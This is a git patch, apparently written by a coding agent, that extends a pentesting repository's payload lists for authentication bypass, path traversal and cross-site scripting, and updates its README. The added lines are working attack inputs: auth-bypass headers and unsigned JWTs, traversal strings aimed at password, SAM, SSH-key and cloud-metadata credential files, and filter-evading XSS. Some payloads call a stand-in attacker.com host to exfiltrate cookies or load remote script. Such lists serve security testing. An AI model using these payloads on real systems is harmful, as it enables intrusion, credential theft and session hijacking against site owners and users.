From b58ed035c8eb3909f29736c7a98f986ada945e87 Mon Sep 17 00:00:00 2001
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com>
Date: Mon, 5 Jan 2026 14:53:43 +0000
Subject: [PATCH] Enhance existing vulnerabilities with comprehensive payloads
 (XSS, Auth Bypass, Path Traversal) and update README

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
---
 .../auth-bypass-payloads.txt                  | 223 ++++++++++++++
 Path-Traversal/path-traversal-payloads.txt    | 290 ++++++++++++++++++
 README.md                                     |   4 +
 XSS/xss-payloads.txt                          | 212 +++++++++++++
 4 files changed, 729 insertions(+)

diff --git a/Authentication-Bypass/auth-bypass-payloads.txt b/Authentication-Bypass/auth-bypass-payloads.txt
index b9de7fa..5ac9a7a 100644
--- a/Authentication-Bypass/auth-bypass-payloads.txt
+++ b/Authentication-Bypass/auth-bypass-payloads.txt
@@ -45,3 +45,226 @@ X-Original-URL: /admin
 X-Rewrite-URL: /admin
 X-Originating-IP: 127.0.0.1
 X-Remote-Addr: 127.0.0.1
+X-Custom-IP-Authorization: 127.0.0.1
+X-Client-IP: 127.0.0.1
+X-Real-IP: 127.0.0.1
+X-Host: localhost
+X-Forwarded-Host: localhost
+
+# URL path manipulation
+/admin/..;/
+/admin/%2e%2e%3b/
+/./admin/./
+/admin;/
+/admin..
+//admin//
+/./admin/./panel
+/%2e/admin
+/admin/~
+/admin#
+/admin?
+
+# HTTP verb tampering
+GET /admin
+POST /admin
+HEAD /admin
+PUT /admin
+DELETE /admin
+OPTIONS /admin
+TRACE /admin
+PATCH /admin
+
+# Case manipulation
+/Admin
+/ADMIN
+/AdMiN
+/aDmIn
+
+# Unicode bypass
+/admin%c0%af
+/admin%e0%80%af
+/admin%c0%ae%c0%ae/
+/%61dmin
+
+# Double encoding
+/%252e%252e%252fadmin
+/%252e%252e/admin
+
+# Null byte injection
+/admin%00
+/admin%00.html
+/admin%00.jpg
+
+# Credential stuffing patterns
+admin:admin
+administrator:administrator
+root:root
+admin:password
+admin:123456
+admin:admin123
+test:test
+guest:guest
+user:user
+demo:demo
+
+# Default credentials bypass
+username=admin&password=
+username=&password=
+username=admin&password=%20
+username=admin&password=*
+
+# Password reset bypass
+email=victim@example.com&email=attacker@example.com
+token=&email=attacker@example.com
+token=0
+token=null
+token=false
+
+# OTP/2FA bypass
+otp=000000
+otp=123456
+otp=111111
+otp=
+otp=%20
+otp=null
+
+# Response manipulation
+# Change HTTP response from 401/403 to 200
+# Change "authenticated": false to "authenticated": true
+# Change "role": "user" to "role": "admin"
+
+# JWT manipulation (see JWT-Vulnerabilities for more)
+Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
+Authorization: Bearer null
+Authorization: Bearer 
+Authorization: 
+
+# GraphQL authentication bypass
+{"query":"mutation{login(username:\"admin\",password:\"' OR '1'='1\"){token}}"}
+{"query":"{users{id username password}}"}
+
+# XML authentication bypass
+<user><username>admin</username><password>' OR '1'='1</password></user>
+
+# LDAP authentication bypass
+username=*
+username=admin)(|(password=*
+username=*)(uid=*))(|(uid=*
+
+# OAuth/OIDC bypass
+redirect_uri=https://attacker.com
+state=
+nonce=
+code=
+
+# API key bypass
+api_key=
+X-API-Key: 
+Authorization: 
+apikey=null
+
+# Session fixation
+PHPSESSID=attacker_controlled_session
+jsessionid=12345
+
+# CAPTCHA bypass
+captcha=
+g-recaptcha-response=
+h-captcha-response=
+captcha_response=03AAYGu2...
+recaptcha=
+
+# Rate limiting bypass
+X-Forwarded-For: random_ip_each_request
+X-Originating-IP: random_ip_each_request
+X-Remote-IP: random_ip_each_request
+
+# Account enumeration
+username=admin&password=wrong
+username=nonexistent&password=wrong
+
+# Login form variations
+user[admin]=1
+user[role]=admin
+username[]=admin
+password[]=anything
+
+# Time-based bypass
+wait_for_rate_limit=true
+timestamp=future_date
+valid_until=9999999999
+
+# Magic hashes (PHP type juggling)
+# 0e215962017 == 0 (PHP)
+# 0e291242476940776845150308577824 == 0
+password=0e215962017
+password=240610708
+
+# Unicode normalization
+username=ⓐⓓⓜⓘⓝ
+username=𝒶𝒹𝓂𝒾𝓃
+username=ａｄｍｉｎ
+
+# Homograph attack
+username=αdmin (Greek alpha)
+username=аdmin (Cyrillic а)
+
+# Whitespace bypass
+username= admin
+username=admin 
+username=%20admin
+username=admin%20
+
+# Special characters
+username=admin'
+username=admin"
+username=admin`
+username=admin\
+
+# Email bypass for authentication
+email=admin@localhost
+email=admin@127.0.0.1
+email=@example.com
+email=victim@attacker.com
+
+# Host header authentication bypass
+Host: localhost
+Host: 127.0.0.1
+Host: internal.company.com
+
+# Referer bypass
+Referer: https://trusted-site.com
+Referer: https://localhost
+
+# Origin bypass
+Origin: https://trusted-site.com
+Origin: null
+
+# Authentication via GET instead of POST
+GET /api/login?username=admin&password=admin123
+
+# File inclusion for authentication bypass
+/etc/passwd
+../../../../../../etc/passwd
+
+# SSRF to bypass authentication
+url=http://localhost/admin
+url=http://127.0.0.1/admin
+url=http://169.254.169.254/latest/meta-data/
+
+# Request smuggling for authentication bypass
+Content-Length: 0
+Transfer-Encoding: chunked
+
+# Race conditions
+# Send multiple authentication requests simultaneously
+
+# Business logic bypass
+step=1&step=3
+status=pending&status=approved
+verified=false&verified=true
+
+# Broken authentication chain
+# Skip step 2 in multi-step authentication
+# Reuse old session tokens
+# Replay old authentication requests
diff --git a/Path-Traversal/path-traversal-payloads.txt b/Path-Traversal/path-traversal-payloads.txt
index d3d9a8d..5c141f7 100644
--- a/Path-Traversal/path-traversal-payloads.txt
+++ b/Path-Traversal/path-traversal-payloads.txt
@@ -55,3 +55,293 @@
 ../../../.env
 ../../../web.config
 ../../../application.properties
+
+# Advanced encoding techniques
+..%c0%af
+..%c1%9c
+..%e0%80%af
+..%f0%80%80%af
+..%c0%2f
+..%c0%5c
+
+# Unicode bypass
+..%u2216
+..%u2215
+..%uEFC8
+..%uF025
+
+# 16-bit Unicode
+..%c0%af
+..%c1%9c
+%c0%ae%c0%ae/
+%c0%ae%c0%ae%c0%af
+
+# UTF-8 encoding
+%e0%80%ae%e0%80%ae/
+%c0%2e%c0%2e/
+%uff0e%uff0e/
+
+# Overlong UTF-8
+..%c0%af
+..%e0%80%af
+..%c0%2e%c0%2e%c0%2f
+
+# Backslash variations
+..\
+..\..
+..\\
+..\\..\\
+%2e%2e%5c
+%2e%2e%2f
+
+# Mixed slash/backslash
+..\/
+..\/..\
+../\..\
+..\/../
+
+# Absolute path bypass
+/etc/passwd
+/etc/shadow
+/etc/hosts
+/var/log/apache2/access.log
+/var/log/auth.log
+/proc/self/environ
+/proc/self/cmdline
+/proc/self/fd/0
+/proc/self/fd/1
+/proc/self/fd/2
+
+# Windows absolute paths
+C:\Windows\System32\drivers\etc\hosts
+C:\Windows\System32\config\SAM
+C:\Windows\System32\config\SYSTEM
+C:\boot.ini
+C:\inetpub\wwwroot\web.config
+
+# Nested traversal
+....//
+....\/
+..../\
+....\\
+
+# Dot segment bypass
+./../
+./../../
+././../
+./.././../
+
+# Multiple slashes
+...//
+....///
+.....////
+
+# Filter bypass with current directory
+.//.//.//.//..//
+.//.//.//.//.//
+
+# Stripped traversal (if ../ is filtered)
+...//...//
+....\/....\/
+..;/..;/
+..;//..;//
+
+# Null byte variations
+../../../etc/passwd%00
+../../../etc/passwd%00.png
+../../../etc/passwd\x00
+../../../etc/passwd\0
+
+# Path normalization bypass
+/var/www/../../etc/passwd
+/./var/./www/./../../etc/passwd
+//var//www//../../etc/passwd
+
+# URL parameter pollution
+?file=safe.txt&file=../../../etc/passwd
+?path=images&path=../../../etc/passwd
+
+# Common web files
+../../../index.php
+../../../index.html
+../../../wp-config.php
+../../../configuration.php
+../../../settings.php
+../../../config.php
+../.git/config
+../.env
+../.htaccess
+
+# Framework-specific files
+# Laravel
+../../../.env
+../../../storage/logs/laravel.log
+../../../config/database.php
+../../../config/app.php
+
+# Symfony
+../../../.env.local
+../../../config/packages/security.yaml
+../../../var/log/dev.log
+
+# Django
+../../../settings.py
+../../../manage.py
+../../../db.sqlite3
+
+# Spring Boot
+../../../application.properties
+../../../application.yml
+../../../application-prod.properties
+
+# Ruby on Rails
+../../../config/database.yml
+../../../config/secrets.yml
+../../../Gemfile
+
+# Node.js/Express
+../../../package.json
+../../../.env
+../../../config/default.json
+
+# ASP.NET
+../../../web.config
+../../../Web.config
+../../../appsettings.json
+../../../appsettings.Production.json
+
+# Java
+../../../WEB-INF/web.xml
+../../../META-INF/context.xml
+../../../WEB-INF/classes/application.properties
+
+# Cloud provider metadata
+../../../../../../proc/self/environ
+../../../../../../proc/version
+../../../../../../proc/cmdline
+
+# AWS metadata
+http://169.254.169.254/latest/meta-data/
+http://169.254.169.254/latest/user-data/
+http://169.254.169.254/latest/dynamic/instance-identity/document
+
+# Azure metadata
+http://169.254.169.254/metadata/instance?api-version=2021-02-01
+
+# GCP metadata
+http://metadata.google.internal/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+
+# Docker
+../../../../../../proc/self/cgroup
+../../../../../../proc/self/mountinfo
+../../../../../../etc/hostname
+
+# Log files
+../../../var/log/apache2/access.log
+../../../var/log/apache2/error.log
+../../../var/log/nginx/access.log
+../../../var/log/nginx/error.log
+../../../var/log/auth.log
+../../../var/log/syslog
+../../../var/log/mail.log
+../../../var/log/mysql/error.log
+
+# Windows log files
+C:\Windows\System32\winevt\Logs\Application.evtx
+C:\Windows\System32\winevt\Logs\Security.evtx
+C:\Windows\System32\winevt\Logs\System.evtx
+
+# SSH keys
+../../../root/.ssh/id_rsa
+../../../root/.ssh/id_dsa
+../../../root/.ssh/authorized_keys
+../../../home/user/.ssh/id_rsa
+../../../home/user/.ssh/authorized_keys
+
+# Database files
+../../../var/lib/mysql/mysql/user.MYD
+../../../var/lib/postgresql/data/pg_hba.conf
+../../../var/lib/mongodb/data/db
+
+# Backup files
+../../../backup.sql
+../../../database.sql
+../../../db_backup.sql
+../../../site_backup.tar.gz
+../../../backup.zip
+
+# Source code files
+../../../.git/HEAD
+../../../.git/config
+../../../.git/logs/HEAD
+../../../.svn/entries
+../../../.hg/hgrc
+
+# Session files
+../../../tmp/sess_*
+../../../var/lib/php/sessions/sess_*
+../../../tmp/sessions/*
+
+# Cache files
+../../../tmp/cache/*
+../../../var/cache/*
+../../../storage/cache/*
+
+# Temporary files
+../../../tmp/*
+../../../temp/*
+../../../var/tmp/*
+
+# SSRF via path traversal
+file:///etc/passwd
+file:///C:/Windows/System32/drivers/etc/hosts
+file://localhost/etc/passwd
+file://127.0.0.1/etc/passwd
+
+# Path traversal in cookies
+Cookie: file=../../../etc/passwd
+Cookie: path=../../../var/www/html/index.php
+
+# Path traversal in headers
+X-File: ../../../etc/passwd
+X-Path: ../../../var/www/html/config.php
+User-Agent: ../../../etc/passwd
+Referer: ../../../etc/passwd
+
+# Path traversal in JSON
+{"file":"../../../etc/passwd"}
+{"path":"../../../var/www/html/config.php"}
+{"template":"../../../etc/passwd"}
+
+# Path traversal in XML
+<file>../../../etc/passwd</file>
+<path>../../../var/www/html/config.php</path>
+
+# Polyglot path traversal
+....//....//....//etc/passwd
+..%252f..%252f..%252fetc/passwd
+..%c0%af..%c0%af..%c0%afetc/passwd
+
+# Filter evasion
+..%00/..%00/..%00/etc/passwd
+..%20/..%20/..%20/etc/passwd
+..%09/..%09/..%09/etc/passwd
+
+# Case sensitivity (Windows)
+..\\..\\..\\..\\..\\..\\..\\.\\ETC\\PASSWD
+..\\..\\..\\..\\..\\..\\..\\.\\Etc\\Passwd
+
+# Alternate data streams (Windows)
+../../../test.txt::$DATA
+../../../test.txt::$INDEX_ALLOCATION
+
+# UNC paths (Windows)
+\\\\localhost\\C$\\Windows\\System32\\drivers\\etc\\hosts
+\\\\127.0.0.1\\C$\\Windows\\System32\\config\\SAM
+
+# Mac/Linux specific
+../../../etc/passwd
+../../../etc/master.passwd
+../../../private/etc/master.passwd
+../../../Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
diff --git a/README.md b/README.md
index 321da98..7ab31ad 100644
--- a/README.md
+++ b/README.md
@@ -12,6 +12,7 @@ This repository contains a complete collection of testing payloads organized by
 - **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB)
 - **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection
 - **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks
+- **[SSTI (Server-Side Template Injection)](./SSTI/)** - Template engine exploitation & RCE
 - **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets
 - **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation
 - **[Log Injection](./Log-Injection/)** - Log file manipulation
@@ -34,6 +35,9 @@ This repository contains a complete collection of testing payloads organized by
 
 **Configuration & Design:**
 - **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations
+- **[CORS Misconfiguration](./CORS-Misconfiguration/)** - Cross-origin resource sharing issues
+- **[HTTP Request Smuggling](./HTTP-Request-Smuggling/)** - Request desynchronization attacks
+- **[JWT Vulnerabilities](./JWT-Vulnerabilities/)** - JSON Web Token implementation flaws
 - **[Business Logic](./Business-Logic/)** - Business logic flaws
 - **[Weak Cryptography](./Weak-Cryptography/)** - Weak crypto implementations
 - **[Vulnerable Components](./Vulnerable-Components/)** - Known vulnerable libraries
diff --git a/XSS/xss-payloads.txt b/XSS/xss-payloads.txt
index cec7e12..f1d8aae 100644
--- a/XSS/xss-payloads.txt
+++ b/XSS/xss-payloads.txt
@@ -541,3 +541,215 @@ a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
 
 # SVG/HTML nesting XSS
 <svg></svg></iframe>
+
+# Modern XSS vectors and WAF bypasses
+
+# AngularJS template injection
+{{constructor.constructor('alert(1)')()}}
+{{$on.constructor('alert(1)')()}}
+{{$eval.constructor('alert(1)')()}}
+{{$parent.constructor('alert(1)')()}}
+<div ng-app ng-csp><div ng-controller="test">{{$eval.constructor('alert(1)')()}}</div></div>
+
+# VueJS template injection
+{{constructor.constructor('alert(1)')()}}
+{{_c.constructor('alert(1)')()}}
+<div v-html="'<img src=x onerror=alert(1)>'"></div>
+
+# React JSX injection
+<img src=x onerror={alert(1)} />
+<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}} />
+
+# Mutation XSS (mXSS)
+<noscript><p title="</noscript><img src=x onerror=alert(1)>">
+<listing>&lt;img src=x onerror=alert(1)&gt;</listing>
+<style><img src=x onerror=alert(1)></style>
+
+# DOM clobbering
+<form id=test><input id=test2></form><form id=test2><input id=test></form>
+<img name=alert id=alert src=x onerror=alert(1)>
+<form name=test><input id=attributes></form>
+
+# Polyglot XSS
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+# HTML5 new tags
+<details open ontoggle=alert(1)>
+<details open ontoggle="alert(1)">
+<marquee onstart=alert(1)>
+<meter onmouseover=alert(1)>0</meter>
+<progress value=0 max=100 onmouseover=alert(1)>
+<dialog open onclose=alert(1)>
+<keygen onfocus=alert(1)>
+
+# WebSocket XSS
+<script>ws=new WebSocket('ws://attacker.com');ws.send(document.cookie);</script>
+
+# postMessage XSS
+<script>parent.postMessage('<img src=x onerror=alert(1)>','*')</script>
+<iframe src="javascript:parent.postMessage('<img src=x onerror=alert(1)>','*')">
+
+# Web Worker XSS
+<script>w=new Worker('data:text/javascript,postMessage(document.cookie)');</script>
+
+# Service Worker XSS
+<script>navigator.serviceWorker.register('data:text/javascript,alert(1)')</script>
+
+# CSS-based XSS
+<style>@import'data:text/css,body{background:url(javascript:alert(1))}';</style>
+<style>*{background:url('javascript:alert(1)')}</style>
+<link rel=stylesheet href='data:text/css,*{x:expression(alert(1))}'>
+
+# XML namespace XSS
+<html xmlns:xss>
+<?import namespace="xss" implementation="http://attacker.com/xss.htc"?>
+<xss:xss>test</xss:xss>
+
+# XSLT XSS
+<xsl:value-of select="system-property('xsl:vendor')"/>
+<xsl:template match="/">
+<script>alert(1)</script>
+</xsl:template>
+
+# Unicode bypass
+\u003cscript\u003ealert(1)\u003c/script\u003e
+<script>alert\u0028 1\u0029</script>
+\x3cscript\x3ealert(1)\x3c/script\x3e
+
+# Octal encoding
+\74\163\143\162\151\160\164\76alert(1)\74\57\163\143\162\151\160\164\76
+
+# Hex encoding
+\x3c\x73\x63\x72\x69\x70\x74\x3ealert(1)\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
+
+# HTML entity encoding
+&lt;script&gt;alert(1)&lt;/script&gt;
+&#60;script&#62;alert(1)&#60;/script&#62;
+&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
+
+# Double encoding
+%253Cscript%253Ealert(1)%253C%2Fscript%253E
+
+# UTF-7 encoding
++ADw-script+AD4-alert(1)+ADw-/script+AD4-
+
+# WAF bypass with comments
+<scr<!---->ipt>alert(1)</scr<!---->ipt>
+<scr<script>ipt>alert(1)</scr</script>ipt>
+
+# WAF bypass with null bytes
+<script\x00>alert(1)</script>
+<scri\x00pt>alert(1)</scri\x00pt>
+
+# WAF bypass with newlines
+<script
+>alert(1)</script>
+<scri\npt>alert(1)</scri\npt>
+
+# Obfuscated JavaScript
+<script>eval(atob('YWxlcnQoMSk='))</script>
+<script>Function('alert(1)')()</script>
+<script>[1].map(alert)</script>
+<script>top[/al/.source+/ert/.source](1)</script>
+
+# JSFuck
+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
+
+# Content Security Policy bypass
+<link rel="prefetch" href="javascript:alert(1)">
+<link rel="prerender" href="javascript:alert(1)">
+<base href="javascript:alert(1)//">
+
+# srcdoc iframe XSS
+<iframe srcdoc="<script>alert(1)</script>">
+<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">
+
+# HTML imports XSS
+<link rel="import" href="data:text/html,<script>alert(1)</script>">
+
+# Script gadgets
+<div id=x tabindex=1 onfocus=alert(1)></div><input value=clickme>
+<input onfocus=alert(1) autofocus>
+<input onblur=alert(1) autofocus><input autofocus>
+<video poster=javascript:alert(1)//></video>
+<body onload=alert(1)>
+<body oninput=alert(1)><input autofocus>
+
+# RPO (Relative Path Overwrite)
+<script src="//attacker.com/poc.js"></script>
+<script src="/poc.js"></script>
+
+# Dangling markup injection
+"><img src='//attacker.com?
+'><img src='//attacker.com?
+
+# AngularJS 1.6+ sandbox bypass
+{{constructor.constructor('alert(1)')()}}
+{{$on.constructor('alert(1)')()}}
+{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
+
+# Template literals
+<script>eval(`alert\x281\x29`)</script>
+<script>Function`x${alert`1`}x`</script>
+
+# Arrow functions
+<script>_=alert,_(1)</script>
+<script>(alert)(1)</script>
+<script>[alert][0](1)</script>
+
+# ES6 features
+<script>({alert}={alert:alert},{alert}(1))</script>
+<script>[a,b,c,...alert]=1</script>
+
+# Event handlers with spaces
+< img src=x onerror=alert(1)>
+<img src=x onerror= alert(1)>
+<img src=x onerror = alert(1)>
+
+# Without quotes
+<img src=x onerror=alert(1)>
+<img src=x onerror=alert`1`>
+<img src=x onerror=alert(document.domain)>
+
+# Protocol-relative URL
+<script src=//attacker.com/xss.js></script>
+<img src=//attacker.com/x onerror=alert(1)>
+
+# Meta refresh XSS
+<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
+<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">
+
+# Form action XSS
+<form action="javascript:alert(1)"><input type=submit></form>
+<form><button formaction="javascript:alert(1)">Click</button></form>
+
+# Object data XSS
+<object data="javascript:alert(1)">
+<object data="data:text/html,<script>alert(1)</script>">
+
+# Embed src XSS
+<embed src="javascript:alert(1)">
+<embed src="data:text/html,<script>alert(1)</script>">
+
+# Applet XSS
+<applet code="java.lang.Runtime">
+
+# Audio/Video XSS
+<audio src=x onerror=alert(1)>
+<video src=x onerror=alert(1)>
+
+# Picture XSS
+<picture><source srcset="javascript:alert(1)"></picture>
+
+# Track XSS
+<video><track default src="javascript:alert(1)"></video>
+
+# Shadow DOM XSS
+<div><template shadowroot=open><script>alert(1)</script></template></div>
+
+# Custom elements XSS
+<custom-element onconnected=alert(1)>
+
+# Web Components XSS
+<x-element><script>alert(1)</script></x-element>